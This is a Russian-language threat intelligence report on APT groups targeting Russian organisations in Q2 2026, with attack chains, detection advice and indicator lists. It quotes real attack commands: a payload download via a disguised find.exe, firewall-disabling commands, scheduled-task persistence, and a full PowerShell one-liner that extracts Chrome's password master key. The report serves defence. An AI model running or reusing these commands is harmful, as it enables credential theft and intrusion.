PT Expert Security Center

Анализ активности хакерских группировок, 2 кв. 2026 г.

Введение

Во втором квартале 2026 года специалисты Threat Intelligence PT ESC продолжили отслеживать активность хакерских группировок, атакующих российские организации. За отчетный период собран и верифицирован массив индикаторов компрометации по результатам расследования инцидентов, мониторинга группировок и анализа выявленных образцов вредоносного ПО.

По итогам второго квартала 2026 года зафиксировано 839 уникальных образцов вредоносного ПО, ассоциированных с 17 отслеживаемыми группировками. Динамика уникальных образцов АРТ-группировок по кварталам продолжает восходящий тренд: Q2 2025 — 447, Q3 — 490, Q4 — 584, Q1 2026 — 808, Q2 2026 — 839.

Динамика уникальных образцов АРТ-группировок по кварталам

Распределение образцов между группировками остается неравномерным: наибольшее количество образцов приходится на Rare Werewolf — 224 экземпляра, что составляет около 27% от общего объема. Далее идут DarkGaboon (88), IAmTheKing (72), Goffee (60) и PhantomCore (59). Таким образом, пять наиболее активных группировок суммарно обеспечили около 60% всех образцов.

Распределение образцов по группировкам (топ-13), Q2 2026

На недельной шкале выделяется ряд локальных пиков:

  • Rare Werewolf — 38 образцов на неделе с 27 апреля и повторный подъем до 33 образцов на неделе с 1 июня;
  • DarkGaboon — 22 образца на неделе с 6 апреля;
  • PhantomCore и IAmTheKing — синхронный пик по 17 образцов на неделе с 13 апреля.

Недельная динамика образцов, топ-6 группировок

Помимо анализа активности самих группировок, в рамках мониторинга проводилась классификация атакуемых организаций по отраслевой принадлежности. По итогам второго квартала 2026 года ключевой целью злоумышленников остается финансовый сектор — 14,8% всех зафиксированных атак. За ним следуют правительственный сектор (13,28%) и технологические компании (13,09%). Далее располагаются организации гражданского общества (8,21%), образование (5,16%), транспорт и логистика (4,97%), здравоохранение (4,87%), производство (4,30%) и энергетика (4,20%). Оставшиеся 27,1% распределены между прочими отраслями.

Наиболее атакуемые сектора экономики, Q2 2026

В следующих разделах рассмотрены ключевые тактики, техники и процедуры второго квартала 2026 года и приведены детальные цепочки атак отслеживаемых группировок. Завершает документ раздел с выводами.

Больше информации об активности кибергруппировок можно получить на нашем портале PT Fusion.

Ключевые TTP и тенденции

В активности отслеживаемых группировок во втором квартале 2026 года зафиксирован ряд устойчивых техник. Ниже приведены наиболее значимые из них.

Получение C2 через блокчейн Bitcoin (T1102.001)

Наиболее значимым нововведением квартала стал механизм Hive0117: вместо прописывания адреса управляющего сервера в теле образца JS‑загрузчик обращается к публичным API mempool.space и blockstream.info, запрашивает транзакции по заданному BTC‑адресу и ищет выход типа OP_RETURN. Данные этого выхода (hex‑строка) декодируются в ASCII и образуют актуальный URL C2. Операторы обновляют адрес сервера публикацией новой транзакции; вредоносное ПО не хранит и не запрашивает C2 напрямую. При этом отсутствие явного C2 не исключает возможность детектирования: в качестве сетевого индикатора можно использовать само обращение к публичным API mempool.space, blockstream.info и другим блокчейн‑API, особенно в сегментах, где такой трафик нехарактерен для легитимной активности.

Фишинг (T1566)

Фишинговые рассылки по электронной почте оставались доминирующим вектором первоначального доступа и зафиксированы у всех рассмотренных группировок. В отчетном периоде использовались разнообразные форматы вложений:

  • PE-загрузчики с именами, имитирующими бухгалтерские и служебные документы (Hive0117, PseudoGamaredon) — «Счет на оплату СМ‑28.exe», «Указания по ракетно‑дроновой опасности_498 от 15.06.2026_47.exe»;
  • ZIP-архивы с HTA‑файлами (Tolik, XDSpy) и ODT‑документами с эксплуатацией CVE-2026-21509 (BO Team);
  • RAR-архивы с BAT‑скриптами и AnyDesk‑агентом (Rare Werewolf) и с бэкдором BrockenDoor (BO Team);
  • ZIP-архивы с LNK‑файлами и JScript-дропперами (NetMedved);
  • документы Microsoft Office с вредоносными шаблонами, загружаемыми по протоколу HTTP со скомпрометированных легитимных ресурсов (CloudAtlas).

Отдельно выделяется атака типа business email compromise: группировка Tolik рассылала вредоносные архивы от имени генерального директора организации, подведомственной одному из министерств России. Письмо успешно прошло спам-фильтры, поскольку отправлялось через легитимный почтовый сервер скомпрометированного отправителя (SPF-проверка пройдена). В качестве PDF‑приманки использовался похищенный внутренний документ той же организации.

Доставка через публичные веб-сервисы и oEmbed-цепочки (T1102)

CloudAtlas и NetMedved использовали промежуточные публичные веб-сервисы для сокрытия конечной инфраструктуры. CloudAtlas маршрутизировала загрузку HTA‑файла через WordPress-сайты с открытым oEmbed API, используя эндпойнт /wp‑json/oembed/1.0/embed/. Вместо прямого обращения к серверу с полезной нагрузкой зараженный документ формировал запрос к промежуточному WordPress‑сайту, а адрес конечного ресурса передавался внутри параметра url.

Например, в сетевом дампе фиксировался следующий HTTP‑запрос:

GET /kfm/?wp-json/oembed/1.0/embed/url=https3A2F2Felrionosune.unlu.edu.ar2F/mozzetta HTTP/1.1 
Host: cliente.k4marcas.com.br

В этой цепочке cliente.k4marcas.com.br выступает как промежуточный веб‑ресурс, с которым устанавливается видимое сетевое соединение, а elrionosune.unlu.edu.ar/mozzetta является скрытым конечным ресурсом, переданным внутри oEmbed‑запроса. За счет этого трафик выглядит как обычное обращение к WordPress/oEmbed API, тогда как реальный источник следующего этапа доставки скрывается в параметре запроса. NetMedved применяла собственный redirector‑домен crop.sh и аналогичный oEmbed-эндпойнт для доставки AES‑128‑CBC‑зашифрованного PowerShell‑стейджера второго этапа.

Планировщик задач Windows (T1053.005)

Планировщик задач Windows применялся несколькими группировками для закрепления в системе и регулярного запуска вредоносных компонентов:

  • Tolik создавала задачу AsanaPro\Old\Properties, которая запускала JS‑стилеры через wscript.exe каждые 5 минут.
  • NetMedved закрепляла NetSupport RAT через скрытую задачу планировщика в сочетании с ключом Run при использовании LNK‑сценария.
  • Rare Werewolf создавала задачу автозапуска AnyDesk‑агента при включении хоста.

Ключи автозапуска в реестре (T1547.001)

Ключи автозапуска в реестре использовались для обеспечения выполнения вредоносных компонентов при входе пользователя в систему:

  • NetMedved использовала ключ Run для закрепления NetSupport RAT. В LNK‑сценарии он применялся совместно со скрытой задачей планировщика, а в JScript‑сценарии — как основной механизм закрепления с дополнительным ключом автозагрузки.
  • CloudAtlas прописывала автозапуск VBShower/PowerCloud через ключ TrustedInstaller в ветке HKCU\…\CurrentVersion\Run.

Антибот‑фильтрация исследовательской среды (T1497)

XDSpy развернула на доменах инфраструктуры (copperlab.org, zumwalt.net, kotaka.org) шлюз фильтрации трафика на базе обфусцированного JavaScript. Шлюз профилирует среду исполнения и детектирует sandbox‑окружения, headless-браузеры (Selenium, Playwright, Puppeteer), поисковые краулеры и исследовательские VM — через проверки navigator.webdriver, значений outerWidth/outerHeight и языковых настроек браузера. Клиентам, не прошедшим проверку, возвращается список сработавших проверок через параметр failedChecks. Реальная полезная нагрузка выдается только подлинным пользователям.

Эксплуатация уязвимостей клиентского ПО (T1203)

BO Team применяла CVE‑2026‑21509 — обход защиты OLE в Microsoft Office (CVSS 7.8) — в кампании от имени многопрофильного медицинского центра: при открытии специально сформированного ODT‑документа уязвимость позволяет выполнить произвольный код без дополнительных действий пользователя.

DLL Side‑Loading (T1574.002)

XDSpy использовала DLL Side‑Loading: в архив включался легитимный HMMA2A6S1C.exe, при запуске которого механизм поиска DLL Windows подгружал вредоносную d3d9.dll вместо системной. Пользователю демонстрировался PDF‑документ‑приманка (переименованный в test.cfg), маскирующий фоновое выполнение.

Кража учетных данных и таргетинг на финансовые системы (T1555)

Tolik включала в цепочку атаки модуль извлечения мастер‑ключа шифрования Google Chrome из файла Local State через Windows DPAPI; ключ сохранялся в TXT‑файл и использовался для расшифровки паролей, cookies и данных из SQLite‑базы Login Data.

Шпионаж

Rare Werewolf

Другие названияLibrarian Ghouls
Librarian Likho
Rezet
Начало активности2019
ИнструментыAnyDesk 
Blat
DefenderControl
MipkoEmployeeMonitor
Tuna
География атакРоссия
Венгрия
Казахстан
Беларусь
Атакуемые отраслиАвиационная промышленность 
Аэрокосмическая промышленность 
Военный сектор 
Здравоохранение 
Индустрия гостеприимства 
Исследовательские организации 
Логистические компании 
Медиа 
Образование 
Правительственный сектор 
Производство 
Развлечения 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор
Энергетика

На начальной стадии кибератаки жертве по электронной почте доставляется PE‑загрузчик, открывающий при запуске PDF‑приманку и загружающий с C2‑домена защищенный паролем RAR-архив с вредоносным BAT-скриптом с последующим запуском.

Рисунок 1. Удаленный сервер злоумышленников
Рисунок 2. Документ-приманка

Запущенный на зараженном хосте BAT‑скрипт выполняет следующие действия:

  • установка на зараженном хосте агента AnyDesk с паролем для удаленного доступа к сессии;
  • создание задачи в планировщике Windows на запуск агента AnyDesk при включении зараженного хоста;
  • упаковка экземпляра агента AnyDesk в архив с паролем;
  • SMTP‑эксфильтрация с использованием утилиты Blat защищенного паролем архива с экземпляром агента AnyDesk на адрес электронной почты, передача информации об имени зараженного хоста в заголовке исходящего email.
Рисунок 3. Содержимое bat-скрипта

Получив первоначальный доступ, группировка через установленную AnyDesk‑сессию доставляет на зараженный хост PE‑дроппер, который запускает документ‑приманку и загрузчик следующей стадии. Загрузчик скачивает с внешнего C2‑домена защищенный паролем RAR‑архив со стилером и запускает его.

Рисунок 4. Содержимое bat‑скрипта, загружающего стилер

Стилер рекурсивно собирает файлы форматов DOC, DOCX, RTF и TXT размером от 1 до 50 МБ, игнорируя содержимое ряда системных директорий, архивирует их и отправляет по SMTP‑каналу с использованием .NET‑библиотеки MailKit на адрес в той же доменной зоне, что и инфраструктура первой стадии.

Для сокрытия PE‑лоадеров первой стадии от пользователя группировка применяет стороннее ПО «4t Tray Minimizer», сворачивающее окна приложений в системный трей.

Для поиска описанной активности ВПО рекомендуется использовать набор поведенческих признаков и корреляций. Детектирование может быть ориентировано на:

1. Создание или запуск BAT-файлов из нетипичных пользовательских каталогов.

Следует контролировать создание и запуск BAT‑файлов пользовательских директорий, особенно из %AppData%, %LocalAppData%, %Temp% и вложенных подкаталогов, имитирующих системные расположения.

Пример наблюдаемой активности:

%appdata%\windows\any.bat

Подозрительность повышается, если BAT‑файл запускает загрузку дополнительных файлов, изменяет настройки системы, создает элементы автозагрузки или вызывает системные утилиты администрирования.

2. Закрепление в автозагрузке файлов из нетипичных расположений.

Необходимо контролировать создание или изменение значений автозапуска в пользовательской ветке реестра:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Уделять внимание значениям, указывающим на исполняемые файлы, ярлыки или скрипты из пользовательских директорий, например %AppData%, %LocalAppData% или %Temp%.

Примеры:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ driver update = %appdata%\Windows\Trays\Trays.lnk
 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ userinite = %appdata%\Windows\Run.exe

При построении правила детектирования необходимо учитывать особенности инфраструктуры: такой признак может давать ложные срабатывания, если легитимное ПО активно использует пользовательские каталоги для автозапуска.

3. Использование исполняемых файлов, имитирующих системные бинарные файлы.

Отдельного внимания требует запуск файлов с именами системных утилит Windows из нестандартных расположений. Например, find.exe в легитимном случае должен находиться в системной директории Windows и быть подписан Microsoft. Подозрительным является запуск одноименного файла из пользовательского каталога:

%appdata%\windows\find.exe

Дополнительно следует проверять цифровую подпись файла. Подозрительными могут быть случаи, когда бинарный файл с именем системной утилиты:

  • расположен вне системных директорий;
  • не подписан Microsoft;
  • имеет несоответствующие метаданные;
  • выполняет сетевые соединения или загрузку файлов;
  • сохраняет загруженные объекты с расширениями, отличающимися от расширений в URL.

Примеры наблюдаемой активности:

%appdata%\windows\find.exe -o %appdata%\windows\pas.rar hxxp://goffice[.]click//pas.jpg
%appdata%\windows\find.exe -o %appdata%\windows\driver.exe hxxp://goffice[.]click//driver.jpg

В данном случае подозрительным является не только использование find.exe из пользовательского каталога, но и сохранение файлов с внешнего URL под другими расширениями, например загрузка объекта .jpg с сохранением в качестве .rar или .exe.

4. Сокрытие рабочей директории ВПО.

Дополнительным признаком компрометации может быть изменение атрибутов каталогов в пользовательском профиле с целью их сокрытия.

Пример:

"C:\Windows\System32\attrib.exe" +s +h %appdata%\windows

5. Отключение защитных механизмов.

Следует контролировать попытки остановки или удаления служб защиты, а также отключение профилей Windows Firewall.
Примеры команд:

sc stop mpssvc 
sc delete mpssvc 
netsh advfirewall set allprofiles state off

Наиболее приоритетными для анализа являются случаи, когда такие команды выполняются не администраторами вручную, а скриптами или процессами, запущенными из пользовательских каталогов.

6. Возможная SMTP‑эксфильтрация.

Для выявления возможной эксфильтрации рекомендуется контролировать исходящие SMTP‑сессии с рабочих станций, особенно если они инициируются нетипичными процессами, не являющимися почтовыми клиентами или утвержденными корпоративными агентами.

  • Подозрительными признаками могут быть:
    исходящие соединения на SMTP‑порты из нетипичных сетевых сегментов или от нетипичных процессов;
  • создание RAR‑архивов, в том числе защищенных паролем;
  • массовое чтение пользовательских документов форматов DOC, DOCX, RTF, TXT.
Доменыokbm-bus.nl
info-salut.space
aviatronika.online
oao-vniir.space
zverda.space
zakupky-ru.website
IP-адреса162.248.161.163
Имена файловpop.bat
whatimean.bat
КП новые документы и оплата.scr
Коммерческое предложение, оплата по договору 12-5437.com
Коммерческое предложение № 762-91 для рассмотрения и согласования.com
Контрольная сумма6d86a5719efbce2644de80918aee9531
669d0fdf072bc43eb7c358c65c11e4db
1b12fd9b49f10b41b06532da19548d2c
8922a919fbef13bfcd108d864fa94d4e
c182cdeeed33fb0e92bcae2bd7db97b9
00bb769b1677eeffe095dda6eedbd09a

PseudoGamaredon

Другие названияGamaCopy 
Core Werewolf 
Awaken Likho
Начало активности2023
ИнструментыMeshAgent
RemoteAdmin
UltraVNC
UPX
География атакРоссия
Беларусь
Атакуемые отраслиВоенный сектор 
Здравоохранение 
Исследовательские организации 
Логистические компании 
Медиа 
Правительственный сектор 
Производство 
Розничная торговля 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

Образцы группировки PseudoGamaredon, фиксировавшиеся во втором квартале 2026 года, сохраняют характерный для нее вектор начального доступа через фишинговые рассылки с документами-приманками военной и государственной тематики.

Рисунок 5. Архив с вредоносным исполняемым файлом

В числе выявленных тем: «Указания по ракетно-дроновой опасности», «Уведомление о начале комплексной проверки согласно плану утечек», «Запрос прокуратуры — анализ соблюдения законности при выполнении ГОЗ предприятиями ОПК РФ», «Указания начальникам военных представительств». Такой выбор приманок указывает на целенаправленный таргетинг на сотрудников оборонно-промышленного комплекса и военных представительств.

При запуске дроппер извлекает на зараженный хост PDF‑документ‑приманку с тематическим содержанием и исполняемый файл второй стадии.
В одном из исследованных образцов второй стейдж сохранялся во временный каталог пользователя под именем integrated.exe, а запуск выполнялся через командную строку после искусственной задержки с использованием команды ping.exe ‑n 38 127.0.0.1.

Рисунок 6. Документ‑приманка

После запуска второй стейдж выполняет первичную инвентаризацию зараженного хоста. В зафиксированном сетевом сообщении содержались:

  • имя компьютера;
  • листинг рабочего стола пользователя;
  • список запущенных процессов;
  • сведения о сетевых адаптерах.

Собранные данные сериализуются в JSON и кодируются в Base58 перед отправкой на управляющий сервер, после чего вредоносный процесс выполняет периодические GET‑запросы к отдельному эндпойнту.

IP-адреса104.128.129.184
Имена файловУказания по ракетно‑дроновой опасности_498 от 15.06.2026_47.exe
Контрольная сумма83d6d09c3c238e04780dccbd6b38ed14
5ed3bba0a2182bd33d1454ad58ad1468
3215f75e96dad896f961e13a23c5d17f

Tolik

Другие названияFairy Werewolf
Начало активности2024
ИнструментыUnicorn
Remcos
География атакРоссия
Атакуемые отраслиАэрокосмическая промышленность 
Военный сектор 
Исследовательские организации 
Логистические компании 
Медиа 
Образование 
Правительственный сектор 
Производство 
Развлечения 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

В мае 2026 года специалисты киберразведки PT ESC зафиксировали кибератаку группировки Tolik на предприятие оборонно‑промышленного комплекса. Письмо было отправлено с почтового ящика генерального директора организации, подведомственной одному из министерств России, и успешно прошло спам-фильтры: SPF‑запись соответствовала легитимному почтовому серверу, что свидетельствует о полной компрометации почтового ящика отправителя. Вектор атаки — business email compromise: от имени контрагента, которому доверяет жертва, рассылаются вредоносные архивы.

Рисунок 7. Фишинговое письмо

Во вложении письмо содержало два файла: PDF‑приманку в виде похищенного внутреннего документа скомпрометированной организации и ZIP‑архив «Приложения Исх № 14‑13 422Ц.zip» с тремя HTA‑файлами.

Рисунок 8. Документ-приманка
Рисунок 9. Содержимое архива

Запуск любого из HTA‑файлов приводит к распаковке набора JavaScript‑скриптов в директорию C:\Users\admin\AppData\Local\SevenZipped\
и созданию задачи планировщика Windows для их периодического запуска:

"C:\Windows\System32\schtasks.exe" /create /tn "AsanaPro\Old\Properties" /tr "C:\Windows\System32\wscript.exe \"C:\Users\admin\AppData\Local\SevenZipped\Server\Collapse\Process\setup_file.js\"" /sc minute /mo 5 /rl LIMITED /f

В рамках детектирования можно рассматривать события создания задач планировщика, где в качестве исполняемой команды указываются wscript.exe, cscript.exe, mshta.exe, powershell.exe или другие интерпретаторы/LOLBins. Дополнительно можно отслеживать последующий запуск подозрительных дочерних процессов от schtasks.exe или Task Scheduler, например цепочку, в которой задача планировщика приводит к запуску wscript.exe с JavaScript-файлом из пользовательского профиля или временной директории.

При выполнении вредоносные скрипты запускают PowerShell‑команду, которая извлекает мастер‑ключ шифрования паролей Google Chrome из файла Local State, расшифровывает его через DPAPI и сохраняет в TXT‑файл:

powershell -WindowStyle Hidden -Command "& {Add-Type -AssemblyName System.Security;$a=ConvertFrom-Json(Get-Content 'C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State' -Raw);$b=[System.Convert]::FromBase64String($a.os_crypt.encrypted_key);$c=$b[5..($b.Length - 1)];$d=[System.Security.Cryptography.ProtectedData]::Unprotect($c, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser);$e=[System.Convert]::ToBase64String($d);Set-Content -Path 'C:\Users\admin\AppData\Local\CmdMate\Run\SMK1.txt' -Value $e;}"

Полученный ключ в дальнейшем используется для расшифровки сохраненных в браузере паролей, cookies и прочих данных из SQLite‑базы Login Data. Параллельно скрипты загружают с C2‑сервера дополнительный вредоносный модуль.

На подобную активность можно строить детекты по подозрительным PowerShell‑командлетам и характерным фрагментам командной строки. В данном случае такими признаками, в зависимости от инфраструктуры, могут быть:

  • запуск powershell.exe со скрытым окном (-WindowStyle Hidden) в каком-то нетипичном регистре;
  • обращение к файлу Chrome Local State;
  • использование DataProtectionScope: CurrentUser, ConvertFrom‑Json, FromBase64String, ProtectedData: Unprotect;
  • запись результата в пользовательскую директорию через Set‑Content.
IP-адреса94.26.106.91
Имена файловПриложения к Исх № 14-13 422Ц/Сводный комплект расчетно‑обосновывающих материалов по формированию фиксированной цены единицы работ.hta
Приложения к Исх № 14-13 422Ц/Аналитическая справка о ходе и сроках согласования стоимости работ по государственному контракту.hta
Приложения к Исх № 14-13 422Ц/Информация о рисках несвоевременного согласования стоимости работ и возможных последствиях для исполнения государственного контракта.hta
Контрольная суммаe910d38120462b9035bd1dde73fa1b29
abae8924dfe88909cbd3b7c9e9e1c408
8210f586950ad5a9a9fa69e4de77d489
72a19c1d135d702fd1ee08c763c4b7f1

BO Team

Другие названияLifting Zmiy 
Hoody Hyena
Начало активности2024
ИнструментыBrockenDoor
Reverse SSH
DarkGate
Remcos
Babuk
ZeroSSH
Mythic
Cobalt Strike
Znkit
География атакРоссия
Атакуемые отраслиАэрокосмическая промышленность 
Военный сектор 
Здравоохранение 
Индустрия гостеприимства 
Инфраструктура 
Исследовательские организации 
Логистические компании 
Медиа 
Нефтегазовая промышленность 
Образование 
Правительственный сектор 
Производство 
Развлечения 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Энергетика

В мае 2026 года BO Team подготовила инфраструктуру для последующего управления зараженными BrockenDoor хостами: в SOA-записях восьми C2‑доменов в качестве ответственного указан адрес leonorisbruscatti@gmail.com.

Рисунок 10. Вредоносные домены

Эта инфраструктура была задействована уже в середине месяца, когда специалисты киберразведки PT ESC зафиксировали фишинговую кампанию группировки от имени Роскомнадзора.

Жертвам рассылались поддельные уведомления о выявленных правонарушениях; к письму прикладывался RAR‑архив «Акт контрольного (надзорного) мероприятия.rar», содержащий исполняемые файлы бэкдора BrockenDoor и файлы‑приманки.

Рисунок 11. Содержимое архива

Исполняемые файлы BrockenDoor маскировались под «Форма письменных пояснений.exe» и «Уведомление_Роскомнадзор», а в качестве документа‑приманки использовались PDF‑сканы.

Рисунки 12–13. Документы-приманки

Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки

Параллельно вредоносный процесс выполнял сбор сведений о системе: обращался к значениям MachineGuid, ComputerName, данным о версии Windows, типе установки, языковых параметрах, а также проверял ассоциации файлов и наличие офисного ПО.

Сетевое взаимодействие выполнялось с одним и тем же управляющим узлом: zoonoz[.]space. Бэкдор обращался к эндпойнту /t методом POST через 443/tcp. Для запросов использовался одинаковый User‑Agent:

Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0

В июне 2026 года группировка также рассылала фишинговые письма от имени многопрофильного медицинского центра; к письмам прикладывался архив с ODT‑документом, эксплуатирующим уязвимость CVE‑2026‑21509 — обход защиты OLE в Microsoft Office (CVSS 7.8), позволяющий неаутентифицированному злоумышленнику выполнить произвольный код при открытии специально сформированного документа.

Рисунок 14. Фишинговое письмо

Первую фишинговую кампанию с использованием CVE-2026-21509 и принцип эксплуатации уязвимости специалисты PT ESC ранее описывали в Telegram-канале ESCalator.
 

Доменыzoonoz.space
ultraxion.space
rhyolith.online
morchok.site
yagroup.site
shannox.info
prahafour.info
hagara.fun
yandex-disk.com
IP-адреса5.188.60.63
5.188.60.64
5.188.60.65
5.188.60.66
5.188.60.67
5.188.60.161
130.49.186.147
130.49.186.148
130.49.186.149
Имена файловДиагностическое_заключение_1129-05-26.rtf
AO_[REDACTED]_Diagnosticheskoe_zakliuchenie.rar
systemd-remountd
Контрольная сумма5c5ac505404a6d6e7af802ad67f375b2
f29842bc4bd32cb106789f0e8ee51343
560ed22621ec5fc7cea4b4312b477553
cc2bceb353d4fa48390e55ab21fe9f89
20471f3116859f7eda0f9ad756a0e7ad
230b484b3876e461c8cbd9cfedb520b2
3b46d0695d6953adc4c189a150b7e859
c4b68ddbc5a1f89aeea058519ccd0259

XDSpy

Другие названияDwarf Werewolf 
Silent Werewolf
Начало активности2022
ИнструментыDSDownloader
XDigo
Netrunner
XDDown
XDUpload
XDRecon
XDList
DigoLoader
География атакРоссия
Сербия
Украина
США
Казахстан
Беларусь
Молдова
Атакуемые отраслиАвиационная промышленность 
Военный сектор 
Исследовательские организации 
Коммерческий сектор 
Правительственный сектор 
Производство 
Финансовый сектор 
Энергетика

В начале мая 2026 года специалисты киберразведки PT ESC зафиксировали фишинговую кампанию группировки XDSpy, нацеленную на российские организации. Рассылка имитировала деловую переписку по теме «Протокол разногласий» и была направлена через скомпрометированную либо используемую без согласия владельца почтовую инфраструктуру. Такой подход позволял письму успешно проходить SPF‑проверку и снижал вероятность фильтрации на стороне получателя.

Рисунок 15. Фишинговое письмо

В HTML‑теле письма размещалась ссылка на домен mishustincouncil.com. Домен не имел отношения ни к отправителю письма, ни к заявленной теме: сайт оформлен как шаблонная заглушка на тему экологической сертификации и органического земледелия — без реквизитов организации, контактных данных и формы подачи заявки.

Рисунок 16. Фишинговый сайт

При переходе по ссылке пользователь попадал на страницу, содержащую обфусцированный JavaScript. Скрипт имитировал промежуточный экран проверки пользователя с сообщением «One moment, please…» и выполнял клиентское профилирование среды исполнения. На этом этапе страница определяла, является ли посетитель реальным пользователем или автоматизированной средой анализа, после чего инициировала дальнейший запрос к серверной части.

Если клиент успешно проходил проверку и не распознавался как песочница, бот, краулер или исследовательская виртуальная машина, сервер отдавал архив с полезной нагрузкой. Внутри архива находились LNK‑файл и замаскированный архив gab.h. Такая структура позволяла отделить первичный пользовательский артефакт от компонентов следующего этапа и усложняла поверхностный анализ содержимого.

При запуске LNK‑файла выполнялась распаковка замаскированного архива gab.h, после чего скрытно запускался файл U237I22HPG.exe, находившийся внутри распакованного содержимого. Вместе с ним размещалась вредоносная DLL‑библиотека. Дальнейшее выполнение строилось с помощью DLL Side‑Loading: легитимный исполняемый файл запускался в штатном режиме, однако за счет механизма поиска библиотек в его контекст подгружалась вредоносная DLL, расположенная рядом с ним. Такой прием позволяет маскировать выполнение вредоносного кода под активность доверенного приложения и снижает вероятность обнаружения поведенческими средствами защиты.

При неудачном прохождении проверки сервер выдавал файл-заглушку без полезной нагрузки следующего этапа. Такой ответ мог получать клиент, распознанный как песочница, бот, краулер, headless‑браузер или исследовательская виртуальная машина. В результате исследовательские среды и автоматизированные системы анализа получали нерелевантный артефакт, тогда как потенциальным жертвам после успешной проверки отдавался архив с дальнейшим этапом заражения. Этот механизм затруднял автоматический сбор образцов, воспроизведение цепочки доставки и анализ инфраструктуры.

Рисунок 17. Файл-заглушка

В ходе исследования была выявлена дополнительная инфраструктура XDSpy: домены copperlab.org, zumwalt.net и kotaka.org, развернутые по схожей схеме. На этих ресурсах использовался шлюз фильтрации трафика, выполнявший проверку клиента перед выдачей следующего этапа. Он анализировал признаки автоматизации и изолированной среды: наличие navigator.webdriver, headless-режим в userAgent и appVersion, несоответствия в navigator.plugins и navigator.mimeTypes, языковые настройки браузера, значения outerWidth и outerHeight, а также артефакты, характерные для Selenium, Playwright, Puppeteer, песочниц и исследовательских виртуальных машин.

При срабатывании проверок список выявленных признаков передавался на backend через параметр failedChecks. Если клиент не вызывал подозрений, JavaScript формировал скрытую HTML-форму и инициировал запрос к серверному эндпойнту с параметрами, включающими идентификатор сессии, временную метку и исходный URL кампании. На основе этих данных сервер принимал решение о выдаче содержимого: архива с полезной нагрузкой, файла-заглушки либо пустого ответа. Принцип работы подобного шлюза фильтрации трафика ранее был подробно разобран.

Доменыmishustincouncil.com
copperlab.org
zumwalt.net
kotaka.org
Имена файловprof.dat
q.ext
test.cfg
se.xtt
d3d9.dll
Контрольная сумма0e412eee1016178230771edfc3729292
5877cfdfed9b4dd5c5cb93ddd60a8240
5a90871721b0211ae6e3ac9a38d320b1
8adc44964cd24b567eabac278004400a
954f676c879956a6764e457b7e4d0e25
5eb853f02070823df737222db1692d4b
2d9d44f06c357197585e7925df0c49dd
6698faf7e4b60cb88a104f1da471147f
f852c912a9c95313312823cf2482fcb9

Cloud Atlas

Другие названияСloud Werewolf 
Blueodin 
Oxygen 
Clean Ursa 
ATK116 
G0100 
Inception
Начало активности2014
ИнструментыVBCloud
PowerShower
VBShower
CloudAtlas
География атакРоссия
Афганистан
Малайзия
Азербайджан
Беларусь
Бельгия
Молдова
Болгария
Канада
Португалия
Атакуемые отраслиАэрокосмическая промышленность 
Военный сектор 
Здравоохранение 
Исследовательские организации 
Логистические компании 
Медиа 
Нефтегазовая промышленность 
Организации гражданского общества
Правительственный сектор 
Производство 
Розничная торговля 
Сельское хозяйство 
Строительство 
Телекоммуникации 
Технологические компании 
Финансовый сектор 
Электроснабжение
Энергетика

В мае 2026 года команда threat intelligence экспертного центра безопасности Positive Technologies обнаружила очередную кампанию APT-группировки CloudAtlas, в рамках которой применялись характерные документы Microsoft Office с техникой внедрения вредоносных шаблонов и многоступенчатая цепочка доставки HTA‑ и VBS‑компонентов.

Получение первоначального доступа осуществляется через рассылку по электронной почте документов Microsoft Office с внедренными вредоносными шаблонами. При открытии документа шаблон загружается со скомпрометированных легитимных веб-ресурсов в национальных доменных зонах Бразилии, Аргентины и Индонезии. Эту технику эксперты TI PT ESC впервые зафиксировали у CloudAtlas в апреле 2026 года в ходе исследования связи группировки с брокером первоначального доступа Mustard Tempest.

В новой кампании для сокрытия конечной инфраструктуры группировка отказалась от прямых HTTP‑запросов к скомпрометированным ресурсам в пользу механизма oEmbed. Вредоносный документ инициирует запрос к промежуточному легитимному WordPress‑сайту с открытым API‑эндпойнтом /wp-json/oembed/1.0/embed/, который, в свою очередь, перенаправляет запрос на скомпрометированный ресурс с HTA‑дроппером. Реальный источник полезной нагрузки скрыт за цепочкой перенаправлений, что маскирует истинное назначение сетевых соединений и затрудняет сигнатурное обнаружение.

Рисунок 18. oEmbed‑запрос к WordPress‑сайту

Часть обнаруженных документов по тематике и оформлению ориентирована на аудиторию из Ирака — нетипичная для CloudAtlas география атак.

Рисунки 19–20. Документы-приманки

Документы-приманки
Документы-приманки
Документы-приманки
Документы-приманки

Полезной нагрузкой, загружаемой при открытии вредоносного документа, является обфусцированный HTA‑дроппер. Он создает рабочую директорию %APPDATA%\Microsoft\Windows\WebCache\, маскируясь под легитимный системный путь, и извлекает в нее три вредоносных модуля:

  • WebCachea54.vbs;
  • WebCachea54.jfm;
  • WebCachea54tmp0.vbs.
Рисунок 21. Содержимое HTA‑дроппера

Для закрепления в системе в ветке реестра HKCU\Software\Microsoft\Windows\CurrentVersion\Run прописывается команда автозапуска VBS‑скрипта. После этого дроппер инициирует запуск основного и вспомогательного VBS‑скриптов. Это поведение можно попытаться обнаружить по событиям появления VBS‑скриптов в Run-записях реестра.

WebCachea54.vbs реализует многоступенчатую декодировку: извлекает из файла WebCachea54.jfm закодированную строку, декодирует ее с удалением символов-разделителей и выполняет результат как VBS‑код. Итогом является дроппер третьего уровня, также содержащий внутри закодированную полезную нагрузку, которая аналогичным образом декодируется и запускается фрагментами.

Рисунок 22. Содержимое WebCachea54.vbs

Конечным результатом цепочки дропперов является обфусцированный VBS‑лоадер. Прежде всего он собирает информацию о скомпрометированном хосте (имя домена и имя пользователя) и встраивает ее в поле User-Agent исходящих HTTP‑запросов.

VBS-лоадер загружает инструменты из собственного арсенала группировки: загрузчики VBShower и PowerCloud, которые осуществляют дальнейшую эксфильтрацию данных о зараженном хосте и взаимодействие с C2-инфраструктурой через сервис Google Sheets.

